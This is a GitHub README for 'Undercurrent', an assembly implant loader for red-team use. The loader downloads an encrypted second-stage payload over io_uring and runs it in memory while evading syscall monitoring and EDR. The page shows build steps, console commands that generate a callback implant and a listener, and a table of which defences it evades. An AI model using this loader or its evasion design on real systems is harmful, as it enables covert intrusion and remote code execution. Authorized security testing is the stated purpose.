Skip to content

Real-Fruit-Snacks/Undercurrent

BranchesTags

Repository files navigation

Undercurrent

Assembly Platform License

io_uring stealth implant loader in pure x86-64 NASM assembly.

ChaCha20-Poly1305 AEAD encryption. ~4.2KB position-independent shellcode. Zero traditional I/O syscalls — invisible to strace, auditd, seccomp-bpf, and most EDR syscall hooks.

Authorization Required: Designed exclusively for authorized security testing with explicit written permission.

Quick Start

git clone https://github.com/Real-Fruit-Snacks/Undercurrent
cd Undercurrent
pip install cmd2 rich cryptography

make elf          # ELF binary  (~12.7KB)
make shellcode    # raw PIC     (~4.2KB)

Operate:

./uring-console

uring> psk generate
uring> payload /path/to/stage2.bin
uring> generate 10.10.14.5 443 /tmp/implant
uring> listen 443

Features

io_uring Engine

All network I/O via io_uring submission/completion queues. No socket, connect, read, write, send, or recv. Tools hooking the syscall table cannot observe operations.

ChaCha20-Poly1305 AEAD

RFC 8439 authenticated encryption via Grotto's pure-assembly implementation. 256-bit PSK, random 12-byte nonces per message via getrandom(2). Tampered payloads silently rejected.

Syscall Evasion

Only six syscalls: io_uring_setup, io_uring_enter, mmap, mprotect, getrandom, close. seccomp-bpf filters on traditional I/O never fire.

Small Footprint (~4.2KB)

The entire loader — io_uring engine, crypto, networking, staging — in ~4,200 bytes. No compiler, no runtime, no libc. Pure hand-written NASM.

Shellcode Output

Builds as standalone ELF or raw PIC shellcode for injection. Same source, two deployment options. Position-independent with no GOT or PLT.

Architecture

src/
├── main.asm       # Entry point, orchestration
├── uring.asm      # io_uring engine (SQE/CQE)
├── net.asm        # TCP via IORING_OP_SOCKET/CONNECT
├── stage.asm      # mmap → decrypt → mprotect → jmp
├── crypto.asm     # ChaCha20-Poly1305 AEAD
└── cleanup.asm    # Teardown, clean exit

Data flow: implant connects via io_uring, receives encrypted payload, decrypts in anonymous mmap region, transitions RW to RX via mprotect, jumps to entry.

Detection Awareness

Evades Visible To
strace / ltrace Kernel 6.1+ io_uring restrictions
auditd audit hooks io_uring-aware eBPF probes
seccomp-bpf filters Network connection metadata
EDR userland hooks Memory forensics
Disk forensics SELinux / AppArmor

Security

Report vulnerabilities via GitHub Security Advisories.

Undercurrent does not: provide privilege escalation, exploit kernel vulnerabilities, bypass io_uring-aware tools, provide persistence, or encrypt data at rest.

License

MIT — Copyright 2026 Real-Fruit-Snacks

Part of the Real-Fruit-Snacks security toolkit

Aquifer · Cascade · Conduit · Flux · Grotto · Undercurrent

About

io_uring stealth implant loader in pure x86-64 NASM assembly — ChaCha20-Poly1305 AEAD, ~4.2 KB, invisible to syscall monitoring

real-fruit-snacks.github.io/Undercurrent/

Topics

linux encryption assembly x86-64 cybersecurity penetration-testing chacha20-poly1305 infosec shellcode nasm evasion stealth chacha20 red-team security-tools io-uring

Resources

Readme

License

MIT license

Code of conduct

Code of conduct

Contributing

Contributing

Security policy

Security policy
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Contributors

Languages